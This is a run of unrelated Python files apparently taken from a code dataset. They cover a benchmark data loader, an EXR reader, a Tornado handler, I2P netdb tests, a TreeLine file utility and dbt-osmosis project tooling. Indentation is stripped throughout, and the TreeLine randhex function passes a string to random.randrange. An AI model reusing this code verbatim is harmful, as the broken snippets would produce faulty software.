def __next__(self):
if self.index < self.num_datasets:
dataset = self.dataset_names[self.index]
print_sys('--- ' + dataset + ' ---')
data_path = os.path.join(self.path, dataset)
train = pd.read_csv(os.path.join(data_path, 'train.csv'))
valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
test = pd.read_csv(os.path.join(data_path, 'test.csv'))
self.index += 1
return {'train': train, 'valid': valid, 'test': test, 'name': dataset}
else:
raise StopIteration
def get_auxiliary_train_valid_split(self, seed, benchmark):
dataset = fuzzy_search(benchmark, self.dataset_names)
data_path = os.path.join(self.path, dataset)
train = pd.read_csv(os.path.join(data_path, 'train.csv'))
valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
train_val = pd.concat([train, valid]).reset_index(drop = True)
if bm_split_names[self.name][dataset] == 'scaffold':
out = create_scaffold_split(train_val, seed, frac = [0.875, 0.125, 0], entity = 'Drug')
elif bm_split_names[self.name][dataset] == 'random':
out = create_fold(train_val, seed, frac = [0.875, 0.125, 0])
else:
raise NotImplementedError
return out
def get(self, benchmark):
dataset = fuzzy_search(benchmark, self.dataset_names)
data_path = os.path.join(self.path, dataset)
train = pd.read_csv(os.path.join(data_path, 'train.csv'))
valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
test = pd.read_csv(os.path.join(data_path, 'test.csv'))
return {'train': train, 'valid': valid, 'test': test, 'name': dataset}
def evaluate(self, pred, true = None, benchmark = None):
if true is None:
# test set evaluation
metric_dict = bm_metric_names[self.name]
out = {}
for data_name, pred_ in pred.items():
data_name = fuzzy_search(data_name, self.dataset_names)
data_path = os.path.join(self.path, data_name)
test = pd.read_csv(os.path.join(data_path, 'test.csv'))
y = test.Y.values
evaluator = eval('Evaluator(name = \'' + metric_dict[data_name] + '\')')
out[data_name] = {metric_dict[data_name]: round(evaluator(y, pred_), 3)}
return out
else:
# validation set evaluation
if benchmark is None:
raise ValueError('Please specify the benchmark name for us to retrieve the standard metric!')
data_name = fuzzy_search(benchmark, self.dataset_names)
metric_dict = bm_metric_names[self.name]
evaluator = eval('Evaluator(name = \'' + metric_dict[data_name] + '\')')
return {metric_dict[data_name]: round(evaluator(true, pred), 3)}
| StarcoderdataPython |
6510254 | <reponame>gray0018/Normal-integration-benchmark
import OpenEXR
import Imath
import sys
import scipy.io as io
import numpy as np
import cv2
from matplotlib import pyplot as plt
def split_channel(f, channel, float_flag=True):
dw = f.header()['dataWindow']
size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)
if float_flag:
pt = Imath.PixelType(Imath.PixelType.FLOAT)
else:
pt = Imath.PixelType(Imath.PixelType.HALF)
channel_str = f.channel(channel, pt)
img = np.frombuffer(channel_str, dtype=np.float32)
img.shape = (size[1], size[0])
return img
def main(exr_name, output_name, output_format):
f = OpenEXR.InputFile(exr_name)
channels = dict()
for channel_name in f.header()["channels"]:
print(channel_name)
split_channel(f, channel_name)
channels[channel_name] = split_channel(f, channel_name)
normal = np.concatenate((channels["normal.R"][:, :, None], channels["normal.G"][:, :, None], channels["normal.B"][:, :, None]), axis=-1)
depth = np.array(channels["position.B"])
if output_format == "npy":
np.save("{0}_normal.npy".format(output_name), normal)
np.save("{0}_depth.npy".format(output_name), depth)
else:
io.savemat('{0}_normal.mat'.format(output_name), {'est_normal': normal})
io.savemat('{0}_depth.mat'.format(output_name), {'est_depth': depth})
fig1 = plt.subplot(1, 2, 1)
fig1 = plt.imshow(normal/2+.5)
fig1.axes.get_xaxis().set_visible(False)
fig1.axes.get_yaxis().set_visible(False)
fig2 = plt.subplot(1, 2, 2)
fig2 = plt.imshow(depth, "gray")
fig2.axes.get_xaxis().set_visible(False)
fig2.axes.get_yaxis().set_visible(False)
plt.show()
if __name__ =="__main__":
if sys.argv[1] == "--help":
print("usage: python exr-read.py input-exr outputname npy(or mat)")
else:
main(sys.argv[1], sys.argv[2], sys.argv[3])
| StarcoderdataPython |
9631950 | # pylint: disable=attribute-defined-outside-init
""" Proxy S3 as static file handler """
import logging
from tornado.web import StaticFileHandler
from .access_control import UserMixin
LOGGER = logging.getLogger(__name__)
class StaticFiles(UserMixin, StaticFileHandler): # pylint: disable=W0223
""" work around """
sites = {}
@classmethod
def get_content(cls, abspath, start=None, end=None):
""" return content """
LOGGER.info("get abs: %r", abspath)
site = cls.sites[abspath]
_, data = site.get_file(abspath)
return data
def _stat(self):
assert self.absolute_path is not None
abspath = self.absolute_path
LOGGER.info("static abs: %r %r", self.root, self.absolute_path)
if not hasattr(self, "_stat_result"):
result = self.site.get_head(abspath)
self._stat_result = result # pylint: disable=W0201
return self._stat_result
@classmethod
def get_absolute_path(cls, root, path):
""" return abs path of content """
LOGGER.info("make abs: %r %r", root, path)
root = root[:-1] if root[-1] == "/" else root
return path
def validate_absolute_path(self, root, absolute_path):
""" is it valid? and cache site for abspath """
LOGGER.info("validate abs: %r %r", root, absolute_path)
static_prefix = self.settings["static_prefix"]
current_user = self.get_current_user()
self.site = self.application.get_site(
current_user, absolute_path, self.request
)
abspath = f"{static_prefix}{absolute_path}"
self.sites[abspath] = self.site
LOGGER.info("site set: %r", abspath)
return abspath
def finish(self, chunk=None):
""" tidy up sites """
result = super().finish(chunk)
self.site = None
if self.absolute_path:
del self.sites[self.absolute_path]
return result
| StarcoderdataPython |
6643489 | <gh_stars>10-100
# test_netdb.py - Test netdb.py
# Author: <NAME> <<EMAIL>>
# License: MIT
# Note: this uses py.test.
import netdb,os,random
'''
def test_inspect():
netdb.inspect()
'''
def test_sha256():
assert('d2f4e10adac32aeb600c2f57ba2bac1019a5c76baa65042714ed2678844320d0' == netdb.netdb.sha256('i2p is cool', raw=False))
def test_address_valid():
invalid = netdb.netdb.Address()
valid = netdb.netdb.Address()
valid.cost = 10
valid.transport = 'SSU'
valid.options = {'host': '0.0.0.0', 'port': '1234', 'key': '', 'caps': ''}
valid.expire = 0
valid.firewalled = False
assert(valid.valid() and not invalid.valid())
def test_address_repr():
valid = netdb.netdb.Address()
valid.cost = 10
valid.transport = 'SSU'
valid.options = {'host': '0.0.0.0', 'port': '1234', 'key': '', 'caps': ''}
valid.expire = 0
valid.firewalled = False
assert(repr(valid) == 'Address: transport=SSU cost=10 expire=0 options={\'host\': \'0.0.0.0\', \'port\': \'1234\', \'key\': \'\', \'caps\': \'\'} location=None firewalled=False')
# TODO: test_entry*
def test_entry_read_short():
assert(True)
def test_entry_read_mapping():
assert(True)
def test_entry_read():
assert(True)
def test_entry_read_short():
assert(True)
def test_entry_read_byte():
assert(True)
def test_entry_read_string():
assert(True)
def test_entry_init():
assert(True)
def test_entry_load():
assert(True)
def test_entry_verify():
assert(True)
def test_entry_repr():
assert(True)
def test_entry_dict():
assert(True)
# Make some garbage files and hope they break things.
def test_fuzz():
pwd = os.environ['PWD']
for i in range(1,100):
with open('{}/tests/fuzzdb/{}.dat'.format(pwd, i), 'wb') as fout:
fout.write(os.urandom(random.randint(2,400))) # replace 1024 with size_kb if not unreasonably large
# Now let's inspect the garbage.
netdb.inspect(netdb_dir='{}/fuzzdb/'.format(pwd))
| StarcoderdataPython |
20041 | <reponame>Infinidat/infi.gevent-utils
from __future__ import absolute_import
from infi.gevent_utils.os import path
import sys
import os
sys.path.append(os.path.dirname(__file__))
from utils import GreenletCalledValidatorTestCase
class PathTestCase(GreenletCalledValidatorTestCase):
def test_exists(self):
self.switch_validator.assert_called(0)
self.assertFalse(path.exists("/this_path_probably_doesnt_exist_or_else_the_test_will_fail"))
self.switch_validator.assert_called(1)
def test_basename(self):
self.switch_validator.assert_called(0)
self.assertEqual("a.text", path.basename("/a/b/c/a.text"))
self.switch_validator.assert_called(0)
| StarcoderdataPython |
9755759 | <filename>inject/treeline.py
"""treeline.py -- utility functions for working with .trln files
read(path) -- read a .trln file
new(path) -- create a blank, new .trln file
save() -- save the .trln file
g[PATH] -- path of file, used when writing
g[CONTENT] -- the raw JSON content of the .trln file
Indexed fields:
.clear() -- clear indexed fields
.scan() -- (re-)scan .content to populate indexed fields
g[FORMATS] -- the raw formats content of the trln file
g[NODES] -- the raw nodes content of the trln file
g[PROPERTIES] -- the raw properties content of the trln file
g[CHILDREN] -- map from node UID -> children
g[DATA] -- map from node UID -> raw data for the node
g[FORMAT] -- map from node UID -> string name of format for the node
g[TLVERSION] -- version string from .properties
g[TOPNODES] -- list of node UIDs for top-level nodes
"""
import random
import json
import copy
#region Structure Constants
JSON_FORMATS = "formats"
JSON_FORMATNAME = "formatname"
JSON_ICON = "icon"
JSON_OUTPUTLINES = "outputlines"
JSON_TITLELINE = "titleline"
JSON_FIELDS = "fields"
JSON_FIELDNAME = "fieldname"
JSON_FIELDTYPE = "fieldtype"
JSON_LINES = "lines"
JSON_NODES = "nodes"
JSON_CHILDREN = "children"
JSON_DATA = "data"
JSON_FORMAT = "format"
JSON_UID = "uid"
JSON_PROPERTIES = "properties"
JSON_TLVERSION = "tlversion"
JSON_TOPNODES = "topnodes"
#endregion
#region Field Type Constants
FTYPE_TEXT = "Text"
FTYPE_HTMLTEXT = "HtmlText"
FTYPE_ONELINETEXT = "OneLineText"
FTYPE_SPACEDTEXT = "SpacedText"
FTYPE_NUMBER = "Number"
FTYPE_MATH = "Math"
FTYPE_NUMBERING = "Numbering"
FTYPE_DATE = "Date"
FTYPE_TIME = "Time"
FTYPE_DATETIME = "DateTime"
FTYPE_BOOLEAN = "Boolean"
FTYPE_CHOICE = "Choice"
FTYPE_AUTOCHOICE = "AutoChoice"
FTYPE_COMBINATION = "Combination"
FTYPE_AUTOCOMBINATION = "AutoCombination"
FTYPE_EXTERNALLINK = "ExternalLink"
FTYPE_INTERNALLINK = "InternalLink"
FTYPE_PICTURE = "Picture"
FTYPE_REGULAREXPRESSION = "RegularExpression"
#endregion
#region Other Constants
NATIVE_VERSION = "3.1.3" # the version that this code assumes
#endregion
#region Utility Functions
def cite(s):
return "{*"+s+"*}"
def randhex():
"""Return 32 random hex characters."""
return random.randrange("%032x" % random.getrandbits(4*32))
#endregion
#region Global Variables
CONTENT = "CONTENT" # the raw JSON content
PATH = "PATH" # the path the JSON defaults to save to
FORMATS = "FORMATS" # shortcut to formats section of CONTENT
NODES = "NODES" # shortcut to nodes section of CONTENT
PROPERTIES = "PROPERTIES" # shortcut to properties section of CONTENT
CHILDREN = "CHILDREN" # children sections, indexed by node UID
DATA = "DATA" # data sections, indexed by node UID
FORMAT = "FORMAT" # format names, indexed by node UID
TLVERSION = "TLVERSION" # tlversion info, as found in properties
TOPNODES = "TOPNODES" # topnodes UID list, as found in properties
INDENT = "INDENT" # number spaces to indent when saving JSON
g = {CONTENT: None,
PATH: None,
FORMATS: None,
NODES: None,
PROPERTIES: None,
CHILDREN: None,
DATA: None,
FORMAT: None,
TLVERSION: None,
TOPNODES: None,
INDENT: 2}
#endregion
#region Naked Treeline
naked = {
JSON_FORMATS: [
{JSON_FIELDS: [{JSON_FIELDNAME: "Name",
JSON_FIELDTYPE: FTYPE_TEXT}],
JSON_FORMATNAME: "DEFAULT",
JSON_OUTPUTLINES: ["{*Name*}"],
JSON_TITLELINE: "{*Name*}"}
],
JSON_NODES: [
{JSON_CHILDREN: [],
JSON_DATA: {"Name": "Main"},
JSON_FORMAT: "DEFAULT",
JSON_UID: "Main"}
],
JSON_PROPERTIES: {
JSON_TLVERSION: NATIVE_VERSION,
JSON_TOPNODES: ["Main"]
}
}
#endregion
#region Basic Manipulation
def read(path):
"""Read a .trln file into .content.
.scan() is automatically called after reading the file.
"""
g[PATH] = path
g[CONTENT] = json.load(open(path))
scan()
def new(path):
"""Start a new .trln file."""
g[PATH] = path
g[CONTENT] = copy.deepcopy(naked)
scan()
def save(path=None):
"""Save a .trln file.
When path is not supplied, uses the path that was specified when the
file was loaded.
"""
json.dump(g[CONTENT], open(g[PATH], "w", encoding="utf-8"),
indent=g[INDENT])
def scan():
"""Scan .contents into indexed fields.
Indexed fields are:
* g[FORMATS]
* g[NODES]
* g[PROPERTIES]
* g[CHILDREN]
* g[DATA]
* g[FORMAT]
* g[TLVERSION]
* g[TOPNODES]
"""
g[FORMATS] = g[CONTENT][JSON_FORMATS]
g[NODES] = g[CONTENT][JSON_NODES]
g[PROPERTIES] = g[CONTENT][JSON_PROPERTIES]
g[CHILDREN] = {}
g[DATA] = {}
g[FORMAT] = {}
for node in g[NODES]:
uid = node[JSON_UID]
g[CHILDREN][uid] = node[JSON_CHILDREN]
g[DATA][uid] = node[JSON_DATA]
g[FORMAT][uid] = node[JSON_FORMAT]
g[TLVERSION] = g[PROPERTIES][JSON_TLVERSION]
g[TOPNODES] = g[PROPERTIES][JSON_TOPNODES]
#endregion
| StarcoderdataPython |
9604575 | password = input('Enter the password:')
if password in ['<PASSWORD>', '<PASSWORD>']:
print('You may enter.')
else:
print('Begone!')
| StarcoderdataPython |
186620 | <reponame>z3z1ma/dbt-osmosis
from enum import Enum
from itertools import chain
from pathlib import Path
from typing import (Any, Dict, Iterable, Iterator, List, Mapping,
MutableMapping, Optional, Set, Tuple, Union)
import agate
import dbt.config.runtime as dbt_config
import dbt.parser.manifest as dbt_parser
from dbt.adapters.factory import (Adapter, get_adapter, register_adapter,
reset_adapters)
from dbt.contracts.connection import AdapterResponse
from dbt.contracts.graph.manifest import ManifestNode, NodeType
from dbt.contracts.graph.parsed import ColumnInfo, ParsedModelNode
from dbt.exceptions import CompilationException, RuntimeException
from dbt.flags import DEFAULT_PROFILES_DIR, set_from_args
from dbt.task.deps import DepsTask
from dbt.tracking import disable_tracking
from pydantic import BaseModel
from rich.progress import track
from ruamel.yaml import YAML
from dbt_osmosis.core.exceptions import (InvalidOsmosisConfig,
MissingOsmosisConfig,
SanitizationRequired)
from dbt_osmosis.core.logging import logger
disable_tracking()
AUDIT_REPORT = """
:white_check_mark: [bold]Audit Report[/bold]
-------------------------------
Database: [bold green]{database}[/bold green]
Schema: [bold green]{schema}[/bold green]
Table: [bold green]{table}[/bold green]
Total Columns in Database: {total_columns}
Total Documentation Coverage: {coverage}%
Action Log:
Columns Added to dbt: {n_cols_added}
Column Knowledge Inherited: {n_cols_doc_inherited}
Extra Columns Removed: {n_cols_removed}
"""
# TODO: Let user supply a custom config file / csv of strings which we consider "not-documented placeholders", these are just my own
PLACEHOLDERS = [
"Pending further documentation",
"Pending further documentation.",
"No description for this column",
"No description for this column.",
"Not documented",
"Not documented.",
"Undefined",
"Undefined.",
"",
]
FILE_ADAPTER_POSTFIX = "://"
class PseudoArgs:
def __init__(
self,
threads: Optional[int] = 1,
target: Optional[str] = None,
profiles_dir: Optional[str] = None,
project_dir: Optional[str] = None,
vars: Optional[str] = "{}",
):
self.threads = threads
if target:
self.target = target # We don't want target in args context if it is None
self.profiles_dir = profiles_dir or DEFAULT_PROFILES_DIR
self.project_dir = project_dir
self.vars = vars # json.dumps str
self.dependencies = []
self.single_threaded = threads == 1
class OsmosisConfig(str, Enum):
SchemaYaml = "schema.yml"
FolderYaml = "folder.yml"
ModelYaml = "model.yml"
SchemaModelYaml = "schema/model.yml"
class SchemaFile(BaseModel):
target: Path
current: Optional[Path] = None
@property
def is_valid(self) -> bool:
return self.current == self.target
class RestructureQuantum(BaseModel):
output: Dict[str, Any] = {}
supersede: Dict[Path, List[str]] = {}
class DbtOsmosis:
def __init__(
self,
fqn: Optional[str] = None,
target: Optional[str] = None,
profiles_dir: Optional[str] = None,
project_dir: Optional[str] = None,
threads: Optional[int] = 1,
dry_run: bool = False,
):
# Build pseudo args
args = PseudoArgs(
threads=threads,
target=target,
profiles_dir=profiles_dir,
project_dir=project_dir,
)
self.args = args
# Load dbt + verify connection to data warehhouse
set_from_args(args, args)
self.project, self.profile = dbt_config.RuntimeConfig.collect_parts(args)
self.config = dbt_config.RuntimeConfig.from_parts(self.project, self.profile, args)
reset_adapters()
register_adapter(self.config)
self.adapter = self._verify_connection(get_adapter(self.config))
# Parse project
self.dbt = dbt_parser.ManifestLoader.get_full_manifest(self.config)
# Selector Passed in From CLI
self.fqn = fqn
# Utilities
self.yaml = self._build_yaml_parser()
self.dry_run = dry_run
self.track_package_install = (
lambda *args, **kwargs: None
) # Monkey patching to make self compatible with DepsTask
@staticmethod
def _verify_connection(adapter: Adapter) -> Adapter:
try:
with adapter.connection_named("debug"):
adapter.debug_query()
except Exception as exc:
raise Exception("Could not connect to Database") from exc
else:
return adapter
@staticmethod
def _build_yaml_parser() -> YAML:
yaml = YAML()
yaml.indent(mapping=2, sequence=4, offset=2)
yaml.width = 800
yaml.preserve_quotes = True
yaml.default_flow_style = False
return yaml
@property
def project_name(self) -> str:
return self.project.project_name
@property
def project_root(self) -> str:
return self.project.project_root
def rebuild_dbt_manifest(self, reset: bool = False) -> None:
self.dbt = dbt_parser.ManifestLoader.get_full_manifest(self.config, reset=reset)
@property
def manifest(self) -> Dict[str, Any]:
return self.dbt.flat_graph
@staticmethod
def get_patch_path(node: ManifestNode) -> Path:
return Path(node.patch_path.split(FILE_ADAPTER_POSTFIX)[-1])
def execute_macro(
self,
macro: str,
kwargs: Optional[Dict[str, Any]] = None,
run_compiled_sql: bool = False,
fetch: bool = False,
) -> Tuple[
str, Optional[AdapterResponse], Optional[agate.Table]
]: # returns Macro `return` value from Jinja be it string, SQL, or dict
"""Wraps adapter execute_macro"""
with self.adapter.connection_named("dbt-osmosis"):
compiled_macro = self.adapter.execute_macro(
macro_name=macro, manifest=self.dbt, kwargs=kwargs
)
if run_compiled_sql:
resp, table = self.adapter.execute(compiled_macro, fetch=fetch)
return compiled_macro, resp, table
return compiled_macro, None, None
def _filter_model(self, node: ManifestNode) -> bool:
"""Validates a node as being a targetable model. Validates both models and sources."""
fqn = self.fqn or ".".join(node.fqn[1:])
fqn_parts = fqn.split(".")
logger().debug("%s: %s -> %s", node.resource_type, fqn, node.fqn[1:])
return (
# Verify Resource Type
node.resource_type in (NodeType.Model, NodeType.Source)
# Verify Package == Current Project
and node.package_name == self.project_name
# Verify Materialized is Not Ephemeral if NodeType is Model [via short-circuit]
and (node.resource_type != NodeType.Model or node.config.materialized != "ephemeral")
# Verify FQN Length [Always true if no fqn was supplied]
and len(node.fqn[1:]) >= len(fqn_parts)
# Verify FQN Matches Parts [Always true if no fqn was supplied]
and all(left == right for left, right in zip(fqn_parts, node.fqn[1:]))
)
def filtered_models(
self, subset: Optional[MutableMapping[str, ManifestNode]] = None
) -> Iterator[Tuple[str, ManifestNode]]:
"""Generates an iterator of valid models"""
for unique_id, dbt_node in (
subset.items() if subset else chain(self.dbt.nodes.items(), self.dbt.sources.items())
):
if self._filter_model(dbt_node):
yield unique_id, dbt_node
def get_osmosis_config(self, node: ManifestNode) -> Optional[OsmosisConfig]:
"""Validates a config string. If input is a source, we return the resource type str instead"""
if node.resource_type == NodeType.Source:
return None
osmosis_config = node.config.get("dbt-osmosis")
if not osmosis_config:
raise MissingOsmosisConfig(
f"Config not set for model {node.name}, we recommend setting the config at a directory level through the `dbt_project.yml`"
)
try:
return OsmosisConfig(osmosis_config)
except ValueError as exc:
raise InvalidOsmosisConfig(
f"Invalid config for model {node.name}: {osmosis_config}"
) from exc
def get_schema_path(self, node: ManifestNode) -> Optional[Path]:
"""Resolve absolute schema file path for a manifest node"""
schema_path = None
if node.resource_type == NodeType.Model and node.patch_path:
schema_path: str = node.patch_path.partition(FILE_ADAPTER_POSTFIX)[-1]
elif node.resource_type == NodeType.Source:
if hasattr(node, "source_name"):
schema_path: str = node.path
if schema_path:
return Path(self.project_root).joinpath(schema_path)
def get_target_schema_path(self, node: ManifestNode) -> Path:
"""Resolve the correct schema yml target based on the dbt-osmosis config for the model / directory"""
osmosis_config = self.get_osmosis_config(node)
if not osmosis_config:
return Path(node.root_path, node.original_file_path)
# Here we resolve file migration targets based on the config
if osmosis_config == OsmosisConfig.SchemaYaml:
schema = "schema"
elif osmosis_config == OsmosisConfig.FolderYaml:
schema = node.fqn[-2]
elif osmosis_config == OsmosisConfig.ModelYaml:
schema = node.name
elif osmosis_config == OsmosisConfig.SchemaModelYaml:
schema = "schema/" + node.name
else:
raise InvalidOsmosisConfig(f"Invalid dbt-osmosis config for model: {node.fqn}")
return Path(node.root_path, node.original_file_path).parent / Path(f"{schema}.yml")
@staticmethod
def get_database_parts(node: ManifestNode) -> Tuple[str, str, str]:
return node.database, node.schema, getattr(node, "alias", node.name)
def get_base_model(self, node: ManifestNode) -> Dict[str, Any]:
"""Construct a base model object with model name, column names populated from database"""
columns = self.get_columns(node)
return {
"name": node.alias or node.name,
"columns": [{"name": column_name} for column_name in columns],
}
def bootstrap_existing_model(
self, model_documentation: Dict[str, Any], node: ManifestNode
) -> Dict[str, Any]:
"""Injects columns from database into existing model if not found"""
model_columns: List[str] = [
c["name"].lower() for c in model_documentation.get("columns", [])
]
database_columns = self.get_columns(node)
for column in database_columns:
if column.lower() not in model_columns:
logger().info(":syringe: Injecting column %s into dbt schema", column)
model_documentation.setdefault("columns", []).append({"name": column})
return model_documentation
def get_columns(self, node: ManifestNode) -> List[str]:
"""Get all columns in a list for a model"""
parts = self.get_database_parts(node)
table = self.adapter.get_relation(*parts)
columns = []
if not table:
logger().info(
":cross_mark: Relation %s.%s.%s does not exist in target database, cannot resolve columns",
*parts,
)
return columns
try:
columns = [c.name for c in self.adapter.get_columns_in_relation(table)]
except CompilationException as error:
logger().info(
":cross_mark: Could not resolve relation %s.%s.%s against database active tables during introspective query: %s",
*parts,
str(error),
)
return columns
@staticmethod
def assert_schema_has_no_sources(schema: Mapping) -> Mapping:
"""Inline assertion ensuring that a schema does not have a source key"""
if schema.get("sources"):
raise SanitizationRequired(
"Found `sources:` block in a models schema file. We require you separate sources in order to organize your project."
)
return schema
def build_schema_folder_mapping(
self,
target_node_type: Optional[Union[NodeType.Model, NodeType.Source]] = None,
) -> Dict[str, SchemaFile]:
"""Builds a mapping of models or sources to their existing and target schema file paths"""
if target_node_type == NodeType.Source:
# Source folder mapping is reserved for source importing
target_nodes = self.dbt.sources
elif target_node_type == NodeType.Model:
target_nodes = self.dbt.nodes
else:
target_nodes = {**self.dbt.nodes, **self.dbt.sources}
# Container for output
schema_map = {}
logger().info("...building project structure mapping in memory")
# Iterate over models and resolve current path vs declarative target path
for unique_id, dbt_node in self.filtered_models(target_nodes):
schema_path = self.get_schema_path(dbt_node)
osmosis_schema_path = self.get_target_schema_path(dbt_node)
schema_map[unique_id] = SchemaFile(target=osmosis_schema_path, current=schema_path)
return schema_map
def draft_project_structure_update_plan(self) -> Dict[Path, RestructureQuantum]:
"""Build project structure update plan based on `dbt-osmosis:` configs set across dbt_project.yml and model files.
The update plan includes injection of undocumented models. Unless this plan is constructed and executed by the `commit_project_restructure` function,
dbt-osmosis will only operate on models it is aware of through the existing documentation.
Returns:
MutableMapping: Update plan where dict keys consist of targets and contents consist of outputs which match the contents of the `models` to be output in the
target file and supersede lists of what files are superseded by a migration
"""
# Container for output
blueprint: Dict[Path, RestructureQuantum] = {}
logger().info(
":chart_increasing: Searching project stucture for required updates and building action plan"
)
with self.adapter.connection_named("dbt-osmosis"):
for unique_id, schema_file in self.build_schema_folder_mapping(
target_node_type=NodeType.Model
).items():
if not schema_file.is_valid:
blueprint.setdefault(
schema_file.target,
RestructureQuantum(output={"version": 2, "models": []}, supersede={}),
)
node = self.dbt.nodes[unique_id]
if schema_file.current is None:
# Bootstrapping Undocumented Model
blueprint[schema_file.target].output["models"].append(
self.get_base_model(node)
)
else:
# Model Is Documented but Must be Migrated
if not schema_file.current.exists():
continue
# TODO: We avoid sources for complexity reasons but if we are opinionated, we don't have to
schema = self.assert_schema_has_no_sources(
self.yaml.load(schema_file.current)
)
models_in_file: Iterable[Dict[str, Any]] = schema.get("models", [])
for documented_model in models_in_file:
if documented_model["name"] == node.name:
# Bootstrapping Documented Model
blueprint[schema_file.target].output["models"].append(
self.bootstrap_existing_model(documented_model, node)
)
# Target to supersede current
blueprint[schema_file.target].supersede.setdefault(
schema_file.current, []
).append(documented_model["name"])
break
else:
... # Model not found at patch path -- We should pass on this for now
else:
... # Valid schema file found for model -- We will update the columns in the `Document` task
return blueprint
def commit_project_restructure_to_disk(
self, blueprint: Optional[Dict[Path, RestructureQuantum]] = None
) -> bool:
"""Given a project restrucure plan of pathlib Paths to a mapping of output and supersedes which is in itself a mapping of Paths to model names,
commit changes to filesystem to conform project to defined structure as code fully or partially superseding existing models as needed.
Args:
blueprint (Dict[Path, RestructureQuantum]): Project restructure plan as typically created by `build_project_structure_update_plan`
Returns:
bool: True if the project was restructured, False if no action was required
"""
# Build blueprint if not user supplied
if not blueprint:
blueprint = self.draft_project_structure_update_plan()
# Verify we have actions in the plan
if not blueprint:
logger().info(":1st_place_medal: Project structure approved")
return False
# Print plan for user auditability
self.pretty_print_restructure_plan(blueprint)
logger().info(
":construction_worker: Executing action plan and conforming projecting schemas to defined structure"
)
for target, structure in blueprint.items():
if not target.exists():
# Build File
logger().info(":construction: Building schema file %s", target.name)
if not self.dry_run:
target.parent.mkdir(exist_ok=True, parents=True)
target.touch()
self.yaml.dump(structure.output, target)
else:
# Update File
logger().info(":toolbox: Updating schema file %s", target.name)
target_schema: Dict[str, Any] = self.yaml.load(target)
if "version" not in target_schema:
target_schema["version"] = 2
target_schema.setdefault("models", []).extend(structure.output["models"])
if not self.dry_run:
self.yaml.dump(target_schema, target)
# Clean superseded schema files
for dir, models in structure.supersede.items():
preserved_models = []
raw_schema: Dict[str, Any] = self.yaml.load(dir)
models_marked_for_superseding = set(models)
models_in_schema = set(map(lambda mdl: mdl["name"], raw_schema.get("models", [])))
non_superseded_models = models_in_schema - models_marked_for_superseding
if len(non_superseded_models) == 0:
logger().info(":rocket: Superseded schema file %s", dir.name)
if not self.dry_run:
dir.unlink(missing_ok=True)
else:
for model in raw_schema["models"]:
if model["name"] in non_superseded_models:
preserved_models.append(model)
raw_schema["models"] = preserved_models
if not self.dry_run:
self.yaml.dump(raw_schema, dir)
logger().info(
":satellite: Model documentation migrated from %s to %s",
dir.name,
target.name,
)
return True
@staticmethod
def pretty_print_restructure_plan(blueprint: Dict[Path, RestructureQuantum]) -> None:
logger().info(
list(
map(
lambda plan: (blueprint[plan].supersede or "CREATE", "->", plan),
blueprint.keys(),
)
)
)
def build_node_ancestor_tree(
self,
node: ManifestNode,
family_tree: Optional[Dict[str, List[str]]] = None,
members_found: Optional[List[str]] = None,
depth: int = 0,
) -> Dict[str, List[str]]:
"""Recursively build dictionary of parents in generational order"""
if family_tree is None:
family_tree = {}
if members_found is None:
members_found = []
for parent in node.depends_on.nodes:
member = self.dbt.nodes.get(parent, self.dbt.sources.get(parent))
if member and parent not in members_found:
family_tree.setdefault(f"generation_{depth}", []).append(parent)
members_found.append(parent)
# Recursion
family_tree = self.build_node_ancestor_tree(
member, family_tree, members_found, depth + 1
)
return family_tree
def inherit_column_level_knowledge(
self,
family_tree: Dict[str, Any],
) -> Dict[str, Dict[str, Any]]:
"""Inherit knowledge from ancestors in reverse insertion order to ensure that the most recent ancestor is always the one to inherit from"""
knowledge: Dict[str, Dict[str, Any]] = {}
for generation in reversed(family_tree):
for ancestor in family_tree[generation]:
member: ManifestNode = self.dbt.nodes.get(ancestor, self.dbt.sources.get(ancestor))
if not member:
continue
for name, info in member.columns.items():
knowledge.setdefault(name, {"progenitor": ancestor})
deserialized_info = info.to_dict()
# Handle Info:
# 1. tags are additive
# 2. descriptions are overriden
# 3. meta is merged
# 4. tests are ignored until I am convinced those shouldn't be hand curated with love
if deserialized_info["description"] in PLACEHOLDERS:
deserialized_info.pop("description", None)
deserialized_info["tags"] = list(
set(deserialized_info.pop("tags", []) + knowledge[name].get("tags", []))
)
if not deserialized_info["tags"]:
deserialized_info.pop("tags") # poppin' tags like Macklemore
deserialized_info["meta"] = {
**knowledge[name].get("meta", {}),
**deserialized_info["meta"],
}
if not deserialized_info["meta"]:
deserialized_info.pop("meta")
knowledge[name].update(deserialized_info)
return knowledge
def get_node_columns_with_inherited_knowledge(
self,
node: ManifestNode,
) -> Dict[str, Dict[str, Any]]:
"""Build a knowledgebase for the model based on iterating through ancestors"""
family_tree = self.build_node_ancestor_tree(node)
knowledge = self.inherit_column_level_knowledge(family_tree)
return knowledge
@staticmethod
def get_column_sets(
database_columns: Iterable[str],
yaml_columns: Iterable[str],
documented_columns: Iterable[str],
) -> Tuple[List[str], List[str], List[str]]:
"""Returns:
missing_columns: Columns in database not in dbt -- will be injected into schema file
undocumented_columns: Columns missing documentation -- descriptions will be inherited and injected into schema file where prior knowledge exists
extra_columns: Columns in schema file not in database -- will be removed from schema file
"""
missing_columns = [
x for x in database_columns if x.lower() not in (y.lower() for y in yaml_columns)
]
undocumented_columns = [
x for x in database_columns if x.lower() not in (y.lower() for y in documented_columns)
]
extra_columns = [
x for x in yaml_columns if x.lower() not in (y.lower() for y in database_columns)
]
return missing_columns, undocumented_columns, extra_columns
def propagate_documentation_downstream(self, force_inheritance: bool = False) -> None:
schema_map = self.build_schema_folder_mapping()
with self.adapter.connection_named("dbt-osmosis"):
for unique_id, node in track(list(self.filtered_models())):
logger().info("\n:point_right: Processing model: [bold]%s[/bold] \n", unique_id)
# Get schema file path, must exist to propagate documentation
schema_path: Optional[SchemaFile] = schema_map.get(unique_id)
if schema_path is None or schema_path.current is None:
logger().info(
":bow: No valid schema file found for model %s", unique_id
) # We can't take action
continue
# Build Sets
database_columns: Set[str] = set(self.get_columns(node))
yaml_columns: Set[str] = set(column for column in node.columns)
if not database_columns:
logger().info(
":safety_vest: Unable to resolve columns in database, falling back to using yaml columns as base column set\n"
)
database_columns = yaml_columns
# Get documentated columns
documented_columns: Set[str] = set(
column
for column, info in node.columns.items()
if info.description and info.description not in PLACEHOLDERS
)
# Queue
missing_columns, undocumented_columns, extra_columns = self.get_column_sets(
database_columns, yaml_columns, documented_columns
)
if force_inheritance:
